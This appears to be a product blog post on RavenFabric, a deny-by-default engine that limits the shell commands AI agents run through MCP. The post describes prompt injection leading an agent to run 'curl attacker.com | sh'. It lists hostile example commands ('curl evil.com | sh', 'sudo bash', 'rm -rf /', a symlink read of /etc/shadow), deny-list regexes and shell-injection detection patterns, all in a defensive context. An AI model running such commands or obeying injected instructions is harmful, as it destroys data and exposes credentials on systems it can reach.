RavenFabric

How RavenFabric Stops AI Agents from Running rm -rf /

AI coding agents are incredible. Claude, GPT, Cursor, Aider — they write code, run tests, deploy applications. But they also run shell commands. On your production servers. With whatever permissions they happen to have.

What happens when an AI agent hallucinates a destructive command?

The industry's answer so far has been "ask the user to confirm." A modal dialog. A y/n prompt. But that assumes a human is watching. In autonomous workflows — CI/CD pipelines, overnight batch jobs, MCP-connected AI assistants — nobody is watching.

RavenFabric takes a different approach: deny by default, allow by policy, enforce at the agent.

The Threat Model

Consider an AI agent connected to your infrastructure via MCP (Model Context Protocol). It has access to an exec tool that runs shell commands remotely. The agent is helpful — it deploys your code, checks logs, restarts services. Until it doesn't.

These failure modes aren't hypothetical:

  • Hallucinated commands — the model means rm -rf /tmp/build-cache but emits rm -rf /tmp; one dropped path component turns a cache cleanup into a directory wipe
  • Prompt injection — a user's code comment contains instructions that manipulate the AI into running curl attacker.com | sh
  • Over-eager cleanup — the agent decides to "clean up" by removing files it doesn't recognize
  • Privilege escalation — the agent discovers it can sudo and starts "fixing" things

Traditional access control (Unix permissions, sudo rules) wasn't designed for this. It answers "can this user do this?" but not "should this action happen given the current context, intent, and blast radius?"

RavenFabric's Policy Engine

Every command that executes through RavenFabric passes through a deny-by-default policy engine. Nothing runs unless explicitly allowed:

apiVersion: ravenfabric.io/v1alpha1
kind: RPCPolicy
metadata:
  name: ai-agent-restricted
spec:
  commands:
    allow:
      - pattern: "^git -C /workspace .*"
      - pattern: "^npm (ci|test|run build|run lint)$"
      - pattern: "^systemctl (status|restart) myapp$"
    deny:
      - pattern: ".*rm.*-rf.*"
      - pattern: "^sudo .*"
      - pattern: ".*curl.*\\|.*sh.*"
      - pattern: ".*secret.*"
  filesystem:
    allow:
      - path: /workspace
        operations: [read, write, list]
    deny:
      - path: /etc
      - path: /root
      - path: /var/log
  resources:
    maxOutputBytes: 10485760
    taskTimeoutSeconds: 300

This policy allows the AI to work within /workspace, run git and npm, and restart one specific service. Everything else is denied. Not by convention — by enforcement.
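
For illustration, here is a minimal sketch of loading such a policy into compiled pattern lists. It assumes PyYAML is installed; the filename and variable names are hypothetical, not part of RavenFabric's actual tooling:

import re
import yaml  # assumes PyYAML

# Load the RPCPolicy spec shown above (hypothetical filename).
with open("ai-agent-restricted.yaml") as f:
    spec = yaml.safe_load(f)["spec"]

# Compile the allow and deny lists once, up front.
allow_patterns = [re.compile(r["pattern"]) for r in spec["commands"]["allow"]]
deny_patterns = [re.compile(r["pattern"]) for r in spec["commands"]["deny"]]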

Two Checks, Not One

RavenFabric doesn't rely on a single policy check. The architecture enforces two independent checks:

  1. Controller pre-flight — before the command is even sent to the target agent, the orchestrator validates it against policy. This catches obvious violations early and provides fast feedback.
  2. Agent-local enforcement — the agent on the target machine re-checks the command against its own policy copy. Even if the orchestrator is compromised, the agent refuses unauthorized commands.

The agent is always the final authority. A compromised controller, a manipulated client, or a prompt-injected AI cannot override the agent's local policy.
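
In rough pseudocode terms, the flow looks like this. This is a sketch of the architecture, not RavenFabric's actual source; check_policy stands in for the engine described in the next section:

import re

def check_policy(deny, allow, command):
    # Deny-wins evaluation; detailed in the next section.
    if any(re.search(p, command) for p in deny):
        return False
    return any(re.search(p, command) for p in allow)

class Agent:
    """Runs on the target machine and holds its own policy copy."""
    def __init__(self, deny, allow):
        self.deny, self.allow = deny, allow

    def execute(self, command):
        # Check 2: agent-local enforcement, the final authority.
        if not check_policy(self.deny, self.allow, command):
            return {"error": "command denied by agent policy"}
        return {"output": "..."}  # real execution would happen here

class Controller:
    """Orchestrator with its own policy copy, possibly stale."""
    def __init__(self, deny, allow):
        self.deny, self.allow = deny, allow

    def dispatch(self, command, agent):
        # Check 1: pre-flight validation for fast feedback.
        if not check_policy(self.deny, self.allow, command):
            return {"error": "command denied by controller policy"}
        return agent.execute(command)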

Pattern Matching: Regex with Deny-Wins

Policy rules use regex patterns. The evaluation is straightforward:

  1. Check deny list first — if any deny pattern matches, reject immediately
  2. Check allow list — if any allow pattern matches, permit
  3. Default deny — if nothing matches, reject

Deny always wins. You can't accidentally allow rm -rf by adding an overly broad allow rule if a deny pattern catches it. This is the deny-overrides principle familiar from access-control policy languages: an explicit deny beats any allow.
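
A minimal sketch of that evaluation order in Python. The function name is illustrative; the patterns are taken from the policy shown earlier:

import re

def evaluate(command: str, deny: list[str], allow: list[str]) -> bool:
    # 1. Deny list first: any match rejects immediately.
    if any(re.search(p, command) for p in deny):
        return False
    # 2. Allow list: any match permits.
    if any(re.search(p, command) for p in allow):
        return True
    # 3. Nothing matched: default deny.
    return False

deny = [r".*rm.*-rf.*", r"^sudo .*"]
allow = [r"^git -C /workspace .*", r"^npm (ci|test|run build|run lint)$"]

evaluate("npm test", deny, allow)           # True: allow match, no deny match
evaluate("rm -rf /tmp/build", deny, allow)  # False: deny wins
evaluate("ls -la", deny, allow)             # False: default deny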

Shell Injection Prevention

AI agents are particularly susceptible to shell injection because they construct commands from natural language. Consider:

# User asks: "check the status of the service named $(whoami)"
# AI generates: systemctl status $(whoami)
# Shell expands (the agent runs as root): systemctl status root

RavenFabric's policy engine inspects the literal command string before shell expansion. It also detects common injection patterns:

  • Backtick substitution: `command`
  • Dollar substitution: $(command)
  • Pipe chains: safe-cmd | malicious-cmd
  • Semicolons: safe-cmd; malicious-cmd
  • Backgrounding: malicious-cmd &

If the policy doesn't explicitly allow pipe characters in a command pattern, they're rejected. The AI can't construct an injection that the policy engine hasn't anticipated.
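
One way such screening might look, as a sketch. The actual detector's rule set isn't documented here; these patterns just cover the constructs listed above:

import re

# Metacharacter constructs that turn one command into several.
INJECTION_PATTERNS = [
    (r"`[^`]*`", "backtick substitution"),
    (r"\$\([^)]*\)", "dollar substitution"),
    (r"\|", "pipe chain"),
    (r";", "command separator"),
    (r"&&|\|\||&\s*$", "chaining or backgrounding"),
]

def find_injection(command: str) -> str | None:
    # Inspect the literal string, before any shell ever sees it.
    for pattern, label in INJECTION_PATTERNS:
        if re.search(pattern, command):
            return label
    return None

find_injection("systemctl status $(whoami)")  # "dollar substitution"
find_injection("cat notes.txt | sh")          # "pipe chain"
find_injection("npm test")                    # None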

Resource Limits: Containing Blast Radius

Even allowed commands are constrained, as the sketch below illustrates:

  • Output size limit — prevents an AI from running cat /dev/urandom or dumping a 10GB log file into its context window
  • Execution timeout — no command runs forever. A hung process is killed after the configured timeout
  • Filesystem boundaries — symlink resolution before path checks prevents ln -s /etc/shadow /workspace/shadow && cat /workspace/shadow
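
Here is a minimal sketch of enforcing these three limits in Python. The constants mirror the maxOutputBytes and taskTimeoutSeconds fields from the policy above; function names and the workspace path are illustrative:

import os
import subprocess

MAX_OUTPUT_BYTES = 10 * 1024 * 1024  # maxOutputBytes
TIMEOUT_SECONDS = 300                # taskTimeoutSeconds
WORKSPACE = "/workspace"

def path_allowed(path: str) -> bool:
    # Resolve symlinks first, then test the boundary on the real path,
    # so /workspace/shadow -> /etc/shadow is caught.
    real = os.path.realpath(path)
    return real == WORKSPACE or real.startswith(WORKSPACE + os.sep)

def run_limited(argv: list[str]) -> bytes:
    # subprocess.run kills the child and raises TimeoutExpired when
    # the timeout elapses; no command runs forever.
    result = subprocess.run(argv, capture_output=True,
                            timeout=TIMEOUT_SECONDS)
    if len(result.stdout) > MAX_OUTPUT_BYTES:
        # A production engine would truncate while streaming rather
        # than buffer the full output first.
        raise RuntimeError("output exceeds maxOutputBytes")
    return result.stdout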

Audit: Everything Is Logged

Every command — allowed or denied — produces a structured audit entry:

{"timestamp":"2026-05-06T14:23:01Z","action":"exec",
 "command":"rm -rf /tmp/cache","result":"denied",
 "reason":"matches deny pattern: .*rm.*-rf.*",
 "caller":"ai-agent-mcp-session-7f3a","agent":"prod-web-01"}

This creates an immutable trail. When an AI agent misbehaves, you can reconstruct exactly what it attempted, when, and why it was stopped. The audit log is append-only — even a compromised agent cannot delete evidence.
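
A sketch of the append-only write path, assuming JSON Lines on local disk. The log path is hypothetical, and a hardened deployment would also ship entries off-host so a compromised machine can't truncate the local file:

import datetime
import json

def audit(log_path: str, **fields) -> None:
    entry = {
        "timestamp": datetime.datetime.now(datetime.timezone.utc)
                     .strftime("%Y-%m-%dT%H:%M:%SZ"),
        **fields,
    }
    # Append mode only ever adds to the end; history is never rewritten.
    with open(log_path, "a") as f:
        f.write(json.dumps(entry) + "\n")

audit("audit.jsonl", action="exec", command="rm -rf /tmp/cache",
      result="denied", reason="matches deny pattern: .*rm.*-rf.*",
      caller="ai-agent-mcp-session-7f3a", agent="prod-web-01")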

MCP Integration

RavenFabric's MCP server (rf-mcp-server) integrates directly with AI assistants. The AI sees tools like rf_exec, rf_file_read, rf_file_write. Behind the scenes, every call goes through the full policy stack:

# AI calls rf_exec("rm -rf /tmp")
# → Policy check: DENIED (matches deny pattern)
# → AI receives: {"error": "command denied by policy"}
# → AI adapts: tries a different, allowed approach

The AI learns from denials. It adapts. It doesn't crash or lose context — it receives a clear error and adjusts its strategy. This is how guardrails should work: not by removing capability, but by bounding it.
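
The shape of that tool handler might look like this. This is a sketch, not the actual rf-mcp-server implementation; the inline policy lists are placeholders for the full engine:

import re

DENY = [r".*rm.*-rf.*", r"^sudo .*"]
ALLOW = [r"^git -C /workspace .*", r"^npm (ci|test|run build|run lint)$"]

def rf_exec(command: str) -> dict:
    # Deny-wins check before anything reaches a shell.
    if any(re.search(p, command) for p in DENY):
        return {"error": "command denied by policy"}
    if not any(re.search(p, command) for p in ALLOW):
        return {"error": "command denied by policy"}
    # Dispatch to the target agent would happen here; the agent
    # re-checks against its own policy copy before executing.
    return {"output": "<command output>"}

rf_exec("rm -rf /tmp")  # {"error": "command denied by policy"}
rf_exec("npm test")     # {"output": "<command output>"}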

Behavioral Anomaly Detection

Static policy catches known-bad patterns. But what about novel attacks? RavenFabric includes behavioral anomaly detection that scores actions across four dimensions:

  • Velocity — sudden spike in command frequency (possible automated attack)
  • Novelty — commands never seen from this caller before
  • Timing — actions outside normal operating hours
  • Escalation — progressive broadening of access (reconnaissance pattern)

When the combined anomaly score exceeds a threshold, capabilities are automatically reduced until a human operator reviews the situation.
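
A toy version of that scoring might combine per-dimension scores like this. The weights and threshold are invented for illustration; the real scorer's parameters aren't documented here:

# Each dimension is scored in [0, 1] by its own detector (not shown).
WEIGHTS = {"velocity": 0.30, "novelty": 0.30,
           "timing": 0.15, "escalation": 0.25}
THRESHOLD = 0.7  # illustrative cutoff

def anomaly_score(scores: dict[str, float]) -> float:
    return sum(WEIGHTS[dim] * scores.get(dim, 0.0) for dim in WEIGHTS)

def should_restrict(scores: dict[str, float]) -> bool:
    # Above the threshold, capabilities drop pending human review.
    return anomaly_score(scores) >= THRESHOLD

should_restrict({"velocity": 1.0, "novelty": 0.8,
                 "timing": 0.2, "escalation": 0.6})  # True (score 0.72)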

The Result

An AI agent connected to RavenFabric can be productive — running builds, deploying code, checking logs — without being dangerous. The policy engine is the boundary between "helpful" and "harmful." It's not a suggestion or a convention. It's enforcement.

No rm -rf /. No sudo bash. No curl evil.com | sh. Not because the AI chose not to — because the system won't let it. Policy is physics, not etiquette.